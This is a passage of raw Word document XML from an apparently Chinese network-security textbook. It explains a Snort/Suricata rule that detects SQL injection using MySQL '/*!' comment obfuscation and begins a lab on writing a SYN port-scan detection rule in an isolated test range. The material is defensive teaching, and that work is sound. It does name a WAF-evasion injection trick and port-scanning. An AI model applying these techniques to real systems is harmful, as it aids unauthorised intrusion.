          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求中的路径和查询字符串），而非整个数据包载荷。这是一个关键的效率与精度优化，避免匹配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP Body </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的无辜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字符串。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">content:“/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">!“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">：匹配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">的条件注释语法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">!…*/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，这是一种常见的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入混淆技巧，用于绕过简单的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> WAF。  -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">within:10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：要求第二个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">必须在第一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">匹配位置之后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个字节内出现。这一相对位置约束大幅降低“SELECT”和“/*!”偶然共现的外部误报。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">metadata:policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：策略标签，用于告警分诊和自动化响应。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：指向安全公告或漏洞库，供分析员溯源。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">classtype</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击分类，用于告警优先级排序和统计报表。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：规则唯一标识符。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sid &lt; 1000000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">保留给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Sourcefire（Snort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原厂）规则，用户自定义规则从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1000001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开始。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rev` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为规则版本号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上述规则的检测逻辑可以直观理解为：**在所有从外部发往内部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口的已建立</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接中，寻找</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">里同时包含“SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">”和“/*!”且两者相对位置不超过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节的数据包，如果满足则生成一条</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入尝试告警。**</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="331"/>
    <w:bookmarkStart w:id="332" w:name="实操单元编写部署与验证一条端口扫描检测规则③-②"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实操单元：编写、部署与验证一条端口扫描检测规则③</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ②</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本实操在隔离的靶场环境中进行，攻击机（Kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux）与靶机（Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所在主机）分属同一虚拟网络的不同</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP。Suricata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部署在独立的监控虚拟机或直接部署在靶机上监听其网卡流量。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第一步：环境启动与流量监控准备</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suricata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为例（Snort</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作类似），在监控主机执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 确认 Suricata 已安装</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">suricata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--build-info</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 编辑配置文件（路径因发行版而异）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vim /etc/suricata/suricata.yaml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在配置文件中确认：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">af-packet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pcap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">抓包接口的网卡名称正确（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> eth1、ens34 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应连接实验网络的那块网卡）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">default-log-dir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指向期望的日志输出目录。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rule-files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">列表里包含自定义规则文件路径。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">创建自定义规则文件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vim /etc/suricata/rules/local.rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第二步：编写端口扫描检测规则</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">需求分析：TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描（半开扫描，Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ch5）的核心网络特征是一个源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在短时间内向单台靶机的大量不同端口发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包，且这些连接多为非完整三次握手（靶机回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN-ACK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后攻击机发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ACK，或不回任何包）。然而，单个包特征不足以判定扫描，扫描行为属于“统计型攻击”，需要关联多个包的元信息。Suricata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内置了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">detection_filter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">threshold</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关键字来支持这种频率统计。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alert tcp $EXTERNAL_NET any -&gt; $HOME_NET any (</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg:"SCAN TCP SYN portscan detected";</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> flags:S,12;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> flow:stateless;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> threshold:type both, track by_src, count 20, seconds 5;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> classtype:attempted-recon;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> sid:1000010; rev:1;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则字段解释：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flags:S,12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：匹配</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标志位。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标志置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是保留字段（具体含义查阅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RFC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">793——已见《从位到物联》Ch27</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机，此处是其在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则中的直接工程应用）。这条匹配所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flow:stateless</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：不对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接状态机做跟踪。因为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描产生的本身就是半开连接，使用有状态检测可能将其丢弃。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">threshold:type both, track by_src, count 20, seconds 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">规则核心</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。对每个源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">track by_src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">秒内的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包计数值达到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">20，则该规则对该源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
